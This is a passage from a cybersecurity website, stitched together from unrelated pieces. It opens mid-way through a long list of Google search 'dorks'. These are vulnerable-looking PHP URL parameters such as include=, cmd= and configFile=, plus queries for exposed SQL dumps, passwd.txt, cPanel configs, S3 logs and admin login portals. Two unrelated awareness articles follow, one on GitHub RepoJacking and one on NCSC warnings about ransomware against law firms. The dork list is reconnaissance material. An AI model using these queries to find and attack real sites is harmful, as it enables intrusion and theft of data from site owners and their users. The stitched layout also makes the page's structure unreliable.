standard.php?cont=
standard.php?destino=
standard.php?dir=
standard.php?e=
standard.php?ev=
standard.php?eval=
standard.php?go=
standard.php?goFile=
standard.php?goto=
standard.php?home=
standard.php?in=
standard.php?include=
standard.php?index=
standard.php?j=
standard.php?lang=
standard.php?link=
standard.php?menu=
standard.php?middle=
standard.php?my=
standard.php?name=
standard.php?numero=
standard.php?oldal=
standard.php?op=
standard.php?open=
standard.php?pagina=
standard.php?panel=
standard.php?param=
standard.php?phpbb_root_path=
standard.php?pollname=
standard.php?pr=
standard.php?pre=
standard.php?pref=
standard.php?q=
standard.php?qry=
standard.php?ref=
standard.php?s=
standard.php?secc=
standard.php?seccion=
standard.php?section=
standard.php?showpage=
standard.php?sivu=
standard.php?str=
standard.php?subject=
standard.php?url=
standard.php?var=
standard.php?viewpage=
standard.php?w=
standard.php?where=
standard.php?xlink=
standard.php?z=
start.php?*root*=
start.php?abre=
start.php?addr=
start.php?adresa=
start.php?b=
start.php?base_dir=
start.php?basepath=
start.php?body=
start.php?chapter=
start.php?cmd=
start.php?corpo=
start.php?destino=
start.php?eval=
start.php?go=
start.php?header=
start.php?home=
start.php?in=
start.php?include=
start.php?index=
start.php?ir=
start.php?lang=
start.php?load=
start.php?loader=
start.php?mid=
start.php?modo=
start.php?module=
start.php?name=
start.php?nivel=
start.php?o=
start.php?oldal=
start.php?op=
start.php?option=
start.php?p=
start.php?pageweb=
start.php?panel=
start.php?param=
start.php?pg=
start.php?play=
start.php?pname=
start.php?pollname=
start.php?rub=
start.php?secao=
start.php?seccion=
start.php?seite=
start.php?showpage=
start.php?sivu=
start.php?sp=
start.php?str=
start.php?strona=
start.php?thispage=
start.php?tipo=
start.php?where=
start.php?xlink=
stat.php?id=
static.php?id=
stockists_list.php?area_id=
store_bycat.php?id=
store_listing.php?id=
Store_ViewProducts.php?Cat=
store-details.php?id=
store.php?cat_id=
store.php?id=
store/default.php?cPath=
store/description.php?iddesc=
store/home.php?cat=
store/index.php?cat_id=
store/product.php?productid=
store/view_items.php?id=
storefront.php?id=
storefronts.php?title=
storeitem.php?item=
storemanager/contents/item.php?page_code=
StoreRedirect.php?ID=
story.php?id=
Stray-Questions-View.php?num=
sub*.php?*[*]*=
sub*.php?*root*=
sub*.php?abre=
sub*.php?action=
sub*.php?adresa=
sub*.php?b=
sub*.php?base_dir=
sub*.php?basepath=
sub*.php?body=
sub*.php?category=
sub*.php?channel=
sub*.php?chapter=
sub*.php?cont=
sub*.php?content=
sub*.php?corpo=
sub*.php?destino=
sub*.php?g=
sub*.php?go=
sub*.php?goFile=
sub*.php?header=
sub*.php?id=
sub*.php?include=
sub*.php?ir=
sub*.php?itemnav=
sub*.php?j=
sub*.php?k=
sub*.php?lang=
sub*.php?left=
sub*.php?link=
sub*.php?load=
sub*.php?menue=
sub*.php?mid=
sub*.php?middle=
sub*.php?mod=
sub*.php?modo=
sub*.php?module=
sub*.php?my=
sub*.php?name=
sub*.php?oldal=
sub*.php?op=
sub*.php?open=
sub*.php?OpenPage=
sub*.php?option=
sub*.php?pa=
sub*.php?pag=
sub*.php?panel=
sub*.php?path=
sub*.php?phpbb_root_path=
sub*.php?play=
sub*.php?pname=
sub*.php?pre=
sub*.php?qry=
sub*.php?recipe=
sub*.php?rub=
sub*.php?s=
sub*.php?sec=
sub*.php?secao=
sub*.php?secc=
sub*.php?seite=
sub*.php?sp=
sub*.php?str=
sub*.php?thispage=
sub*.php?u=
sub*.php?viewpage=
sub*.php?where=
sub*.php?z=
subcategories.php?id=
summary.php?PID=
Supplied argument is not a valid PostgreSQL result
support/mailling/maillist/inc/initdb.php?absolute_path=
sw_comment.php?id=
tas/event.php?id=
tecdaten/showdetail.php?prodid=
tek9.php?
template.php?*[*]*=
template.php?a=
template.php?Action=Item&pid=
template.php?addr=
template.php?base_dir=
template.php?basepath=
template.php?c=
template.php?choix=
template.php?cont=
template.php?content=
template.php?corpo=
template.php?dir=
template.php?doshow=
template.php?e=
template.php?f=
template.php?goto=
template.php?h=
template.php?header=
template.php?ir=
template.php?k=
template.php?lang=
template.php?left=
template.php?load=
template.php?menue=
template.php?mid=
template.php?mod=
template.php?name=
template.php?nivel=
template.php?op=
template.php?opcion=
template.php?pag=
template.php?page=
template.php?pagina=
template.php?panel=
template.php?param=
template.php?path=
template.php?play=
template.php?pre=
template.php?qry=
template.php?ref=
template.php?s=
template.php?secao=
template.php?second=
template.php?section=
template.php?seite=
template.php?sekce=
template.php?showpage=
template.php?sp=
template.php?str=
template.php?t=
template.php?texto=
template.php?thispage=
template.php?tipo=
template.php?viewpage=
template.php?where=
template.php?y=
templet.php?acticle_id=
test.php?page=
theme.php?id=
things-to-do/detail.php?id=
today.php?eventid=
tools/print.php?id=
tools/send_reminders.php?includedir=
top10.php?cat=
topic.php?ID=
toynbeestudios/content.php?id=
tradeCategory.php?id=
trailer.php?id=
trainers.php?id=
transcript.php?id=
trillian.ini
tuangou.php?bookid=
type.php?iType=
UBB.threads")|(inurl:login.php "ubb")
UebiMiau" -site:sourceforge.net
Ultima Online loginservers
Unreal IRCd
updatebasket.php?bookid=
updates.php?ID=
usb/devices/showdev.php?id=
veranstaltungen/detail.php?id=
video.php?content=
video.php?id=
view_author.php?id=
view_cart.php?title=
view_detail.php?ID=
view_faq.php?id=
view_item.php?id=
view_item.php?item=
view_items.php?id=
view_newsletter.php?id=
view_product.php?id=
view-event.php?id=
view.php?*[*]*=
view.php?adresa=
view.php?b=
view.php?body=
view.php?channel=
view.php?chapter=
view.php?choix=
view.php?cid=
view.php?cmd=
view.php?content=
view.php?disp=
view.php?get=
view.php?go=
view.php?goFile=
view.php?goto=
view.php?header=
view.php?id=
view.php?incl=
view.php?ir=
view.php?ki=
view.php?lang=
view.php?load=
view.php?loader=
view.php?mid=
view.php?middle=
view.php?mod=
view.php?oldal=
view.php?option=
view.php?pag=
view.php?page=
view.php?pageNum_rscomp=
view.php?panel=
view.php?pg=
view.php?phpbb_root_path=
view.php?pollname=
view.php?pr=
view.php?qry=
view.php?recipe=
view.php?redirect=
view.php?sec=
view.php?secao=
view.php?seccion=
view.php?second=
view.php?seite=
view.php?showpage=
view.php?sp=
view.php?str=
view.php?to=
view.php?type=
view.php?u=
view.php?var=
view.php?where=
view/7/9628/1.html?reply=
viewapp.php?id=
viewcart.php?CartId=
viewCart.php?userID=
viewCat_h.php?idCategory=
viewevent.php?EventID=
viewitem.php?recor=
viewphoto.php?id=
viewPrd.php?idcategory=
ViewProduct.php?misc=
viewshowdetail.php?id=
viewthread.php?tid=
voteList.php?item_ID=
wamp_dir/setup/yesno.phtml?no_url=
warning "error on line" php sablotron
WebLog Referrers
website.php?id=
Welcome to ntop!
whatsnew.php?idCategory=
wiki/pmwiki.php?page****=
Windows 2000 web server error messages
WsAncillary.php?ID=
WsPages.php?ID=noticiasDetalle.php?xid=
www/index.php?page=
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")
XOOPS Custom Installation
yacht_search/yacht_view.php?pid=
YZboard/view.php?id=
zb/view.php?uid=
zentrack/index.php?configFile=
site:accounts..com/signin/ intitle:"index of" drupal intitle:"index of" admin inurl:login.cgi    Pages Containing Login Portals site:/joomla/administrator
 inurl:/login/index.jsp -site:hertz.*
 intitle:"Index of" inurl:wp-json/oembed    
 intitle:"Index of" phpmyadmin
 intitle:"Index of" wp-admin
 intitle:index.of.?.sql
 inurl: /filemanager/dialog.php
 s3 site:amazonaws.com filetype:log
 inurl:cgi/login.pl
 inurl:zoom.us/j and intext:scheduled for
 site:*/auth intitle:login
 nurl: admin/login.aspx    Pages Containing Login Portals
 "Index of" inurl:webalizer
 "Index of" inurl:phpmyadmin
 "Index of" inurl:htdocs inurl:xampp
 s3 site:amazonaws.com intext:dhcp filetype:txt inurl:apollo
 inurl:/index.aspx/login
 site:amazonaws.com inurl:login.php
 intitle:"IIS Windows Server" -inurl:"IIS Windows Server"
 intitle:"Apache2 Ubuntu Default Page: It works"    
 inurl:/filedown.php?file=
 inurl:Dashboard.jspa intext:"Atlassian Jira Project Management Software"
 inurl:app/kibana intext:Loading Kibana
 site:https://docs.google.com/spreadsheets edit
 inurl:8443 AND -intitle:8443 AND -intext:8443 prohibited|restricted|unauthorized
 intitle:"index of" unattend.xml
 inurl:/admin/index.php
 inurl:bc.googleusercontent.com intitle:index of
 inurl:office365 AND intitle:"Sign In | Login | Portal"
 intext:"@gmail.com" AND intext:"@yahoo.com" filetype:sql
 intitle:OmniDB intext:"user. pwd. Sign in."
 intitle:"qBittorrent Web UI" inurl:8080
 site:com inurl:jboss filetype:log -github.com
 intitle:"index of" ".cpanel/caches/config/"
 inurl:'/scopia/entry/index.jsp'
inurl:/index.aspx/login
 intitle: "index of" "./" "./bitcoin"
 inurl:/portal/apis/fileExplorer/
 intitle:"index of" "/aws.s3/"
 intitle:"index of" hosts.csv | firewalls.csv | linux.csv | windows.csv
 intitle:Test Page for the Nginx HTTP Server on Fedora
 inurl:_cpanel/forgotpwd
 intitle:"index of /" intext:/backup
 intitle:"Swagger UI - " + "Show/Hide"
 site:drive.google.com /preview intext:movie inurl:flv | wmv | mp4 -pdf -edit -view
 intext:"class JConfig {" inurl:configuration.php
 "index of" "database.sql.zip"

Suggest an edit to this article

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Cybersecurity Knowledge Base

Homepage

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
ClosePlease login

The Emerging Threat of RepoJacking: Here’s What You Need to Know

0
github

A new threat has surfaced that could potentially impact millions of GitHub repositories. Known as RepoJacking, this attack could execute code on the internal networks of organizations or even on the networks of their customers. In fact, this includes the repositories of big-name companies like Google and Lyft. In this blog post, we’ll discuss the implications of RepoJacking, how it works, and what you can do to safeguard your repositories.

Understanding the Extent of the Threat

According to a study conducted by AquaSec’s security team, “Nautilus,” approximately 2.95% of the 1.25 million GitHub repositories examined were vulnerable to RepoJacking. To put that into perspective, if we extrapolate these findings to all of GitHub’s 330 million repositories, potentially millions of repositories may be susceptible to a similar assault.

How Does RepoJacking Work?

To understand RepoJacking, it’s crucial to know what happens when a GitHub repository changes its name. This might occur because a company decides to adopt a new brand name, or when companies merge or get acquired, resulting in new management. When a repository’s name changes on GitHub, a redirection is created to prevent code from renamed repositories from breaking dependencies. However, if a hostile actor registers the previous name, they can render the redirection invalid.

The attacker can then control the repository. Consequently, any code or project that depends on the attacked project’s dependencies will retrieve those dependencies and other code from the attacker-controlled repository. This code may include malware.

This situation could also occur if control of a repository is transferred to another user and the original account is deleted. This allows an attacker to create an account with the old username, thereby gaining control over the repository.

Threat actors can identify unique repositories using services like GHTorrent, which harvests GitHub metadata linked to public commits and pull requests.

An example of this is the Google/mathsteps repository, formerly owned by Socratic (socraticorg/mathsteps), a company that Google acquired in 2018. If an attacker were to open the socraticorg/mathsteps repository, users following Google’s instructions would clone the attacker’s repository instead, leading to arbitrary code execution on the user’s systems.

The Current State of GitHub’s Safeguards

GitHub has implemented certain safeguards against RepoJacking attacks. However, these measures appear to be insufficient and relatively easy to bypass. For instance, GitHub only protects the most well-known projects, leaving the lesser-known, more vulnerable projects that depend on them exposed to the supply chain breach.

Moreover, when a repository’s name is changed and GitHub protects it with over 100 clones, it seems like a sign of malicious planning. This protection does not cover projects that gained popularity after changing their name or changing ownership.

Mitigating the Threat

As a first line of defense, it’s crucial to regularly check your repositories for any links that might pull resources from external GitHub repositories. This is because projects like Go modules could change their names at any point. If you notice a name change in a project you depend on, make sure you are pulling from the correct, updated repository.

If your company changes its name, make sure you still own the previous name—even if it’s just a placeholder. This prevents potential intruders from registering and using it for malicious purposes.

RepoJacking is a real and present threat to millions of repositories on GitHub. Awareness of this attack and implementing the suggested mitigation strategies can significantly reduce your vulnerability and ensure the security of your repositories.

See the post from AquaSEC: https://blog.aquasec.com/github-dataset-research-reveals-millions-potentially-vulnerable-to-repojacking

Suggest an edit to this article

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Cybersecurity Knowledge Base

Homepage

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
ClosePlease login

UK Spy Agency: Ransomware Gangs Targeting Law Firms

0
ncsc national cyber security

British legal institutions across the board have been cautioned by the cybersecurity arm of GCHQ. The alarm bells are ringing as these law firms’ shift to hybrid working arrangements and the substantial amounts of money they manage is increasingly drawing the attention of cyber threats.

The cyberspy agency has also issued a note of caution regarding the ties these firms have with the supply chains of adversarial nations. This connection, they warn, marks them as prime targets for cyberattacks.

In a detailed report [PDF] released yesterday, the NCSC identified that the pandemic-induced remote working trend has made legal professionals more susceptible to online attacks. Asides from dealing with substantial financial transfers, these law firms regularly manage sensitive data, making them prime targets for cyber adversaries.

Yet, according to the NCSC, the transition to remote working didn’t receive the kind of criticism tech giants have for its potential to dampen morale and hamper innovation. The NCSC observed that this shift has actually boosted productivity within the legal sector, improving employee happiness by removing commutes and enhancing focus. However, the report noted that this shift introduces difficulties in collaboration and communication, which is where cyber threats like phishing emails find their entry point.

Small law practices face distinct risks due to their dependence on external IT contractors, a factor that complicates self-assessment of the adequacy of their cyber risk controls.

The report underscores the rise in the activity of “hackers-for-hire,” commissioned to conduct harmful cyber activities for third-party clients, usually including information theft to gain advantages in business transactions or legal disputes. These hackers provide their clients with technical prowess and plausible deniability if the cyberattack were to be discovered.

But it’s not just the conventional cybercriminals – the agency also warned of enemy states like Russia, Iran, and North Korea. These nations exploit criminal actors to raise funds, create disruption, and apply criminal malware techniques.

The report highlighted the susceptibility of major law firms, which could be part of wider supply chains exploited by nation states.

Law firms were urged to incorporate security measures within their contracting process and to refrain from paying ransoms, as there’s no assurance of data recovery, and this could encourage future attacks. The agency also advised enhancing password management, restricting user permissions, implementing multi-factor authentication, and maintaining software updates. Regular testing of disaster recovery and backup plans, and maintaining stringent control over remote system access, were other key recommendations.

The report mentioned Pegasus, the software by Israeli company NSO Group, which is capable of extracting data and remotely activating microphones on mobile devices. Lawyers were identified as being among the prime targets of such software.

The NCSC further warned firms to thoroughly consider third-party security measures, noting the primary supply chain issue to be a third-party’s failure to adequately secure sensitive data systems.

The agency also recommended engaging senior leadership in addressing cybersecurity risk, encouraging them to become more informed and proactive about potential threats.

See the report here: https://www.ncsc.gov.uk/files/Cyber-Threat-Report_UK-Legal-Sector.pdf

Suggest an edit to this article

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Cybersecurity Knowledge Base

Homepage

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
ClosePlease login